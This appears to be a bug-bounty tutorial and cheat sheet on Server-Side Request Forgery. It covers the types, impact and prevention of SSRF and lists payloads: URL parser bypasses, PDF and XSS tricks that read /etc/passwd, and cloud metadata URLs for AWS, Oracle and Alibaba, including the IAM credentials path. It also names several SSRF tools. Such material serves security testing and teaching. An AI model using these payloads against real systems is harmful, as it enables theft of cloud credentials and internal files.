Server-Side Request Forgery, SSRF

Server-Side Request Forgery, SSRF for short, is a vulnerability class that describes the behaviour of a server making a request that’s under the attacker’s control. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organisations infrastructure, or to external third-party systems.

What are types of SSRF.

· Blind SSRF occurs when you never get any information about a target service from the initial request

· Semi Blind SSRF

· Non-Blind SSRF

What is the impact of SSRF attacks?

A successful SSRF attack can often result in

· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.

· Scan Local or External Networks.

· Read Files from the Server & Internal Resources

· SSRF to Reflected XSS

· Can fetch the metadata of the servers.

Preventing Server Side Request Forgery (SSRF)

To prevent SSRF vulnerabilities in web applications it is strongly advised to use a white-listings of allowed domains and protocols from where the web server can fetch remote resources.

When you have to try for SSRF?

1. If you got Open Redirect try escalating it to SSRF.

2. SSRF to grep parameters may vulnerable to SSRF.

3. SSRF’s are more in API’s so crawl the whole web app with burp proxy turned on and search for keywords like., eg : ?url= , ?uri= , ?req=

4. Sign up with an Email like attacker.collaborator.net. If u receive HTTP req. in collaborator then its SSRF. But if there’s no impact don’t report it, DNS and SMTP request doesn’t matters.

5. Try to find Blind SSRF on hidden parameter

6. Try Blind SSRF on referer header

How we can Perform a SSRF attack to a target application?

URL based bypasses:

http://google.com:80+&@127.88.23.245:22/#+@google.com:80/

http://127.88.23.245:22/+&@google.com:80#+@google.com:80/

http://google.com:80+&@google.com:80#+@127.88.23.245:22/

http://127.88.23.245:22/?@google.com:80/

http://127.88.23.245:22/#@www.google.com:80/

http://google.com:80\\@127.88.23.245:22/

Bypassing using a redirect

1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)

2. Launch the SSRF pointing to http://vulnerable.com/index.php?url=http://YOUR_SERVER_IP will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1

Bypassing using type=url

Change “type=file” to “type=url”

Paste URL in text field and hit enter

Using this vulnerability users can upload images from any image URL = trigger an SSRF

SSRF exploiting PDF file

<link rel=attachment href=”file:///root/secret.txt”>

SSRF from XSS

The content of the file will be integrated inside the PDF as an image or text.

<img src=”echopwn” onerror=”document.write(‘<iframe src=file:///etc/passwd></iframe>’)”/>

SSRF from CURL

curl http://targetwebsite.com:4567/\?url\=http://10.0.0.2/

It will give something like

RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>

SSRF from Referrer

GET /HTTP 1.1

Host: Targetwebsite.com

User Agent: Firefox

Referrer: https://your_collaborator_instance.com

SSRF from File-upload — redirect test for various cases

Status codes: 300, 301, 302, 303, 305, 307, 308

Filetypes: jpg, json, csv, xml, pdf

JPG 301 response without and with a valid response body:

https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg

https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg

https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg

https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg

JSON 301 response without and with a valid response body:

https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json

https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json

CSV 301 response without and with a valid response body:

https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv

https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv

https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv

https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv

XML 301 response without and with a valid response body:

https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml

https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml

https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml

https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml

pdf 301 response without and with a valid response body:

https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf

https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf

https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf

https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf

AWS:

1. AWS localhost is 169.254.169.254 so don’t use 127.0.0.1 there!

2. If you find any SSRF vulnerability that runs on EC2, try requesting :

http://169.254.169.254/latest/meta-data/

http://169.254.169.254/latest/user-data/

http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE

http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/

SSRF URL for Oracle Cloud

http://192.0.0.192/latest/

http://192.0.0.192/latest/user-data/

http://192.0.0.192/latest/meta-data/

http://192.0.0.192/latest/attributes/

SSRF URL for Alibaba

http://100.100.100.200/latest/meta-data/

http://100.100.100.200/latest/meta-data/instance-id

http://100.100.100.200/latest/meta-data/image-id

Few more Random Payloads that might be helpful in finding SSRF vulnerability.

Use the below payloads in the body of the request

GET /?url=http://google.com/ HTTP/1.1
Host: example.com

GET /?url=http://localhost/server-status HTTP/1.1

GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1

GET /?url=dict://localhost:11211/stat

GET /?url=file:///etc/passwd

file:///, dict://, ftp:// gopher:// keywords

http://example.com/ssrf.php?url=file:///etc/passwd

http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

{“userId”: “1”, “url”: “http://127.0.1:513/"}

{“userId”: “1”, “url”: “http://127.0.0.1:513/"}

Some of the tools that can be used for SSRF

· SSRFmap — https://github.com/swisskyrepo/SSRFmap

· Gopherus — https://github.com/tarunkant/Gopherus

· See-SURF — https://github.com/In3tinct/See-SURF

· SSRF Sheriff — https://github.com/teknogeek/ssrf-sheriff

A white hat Hacker...!!!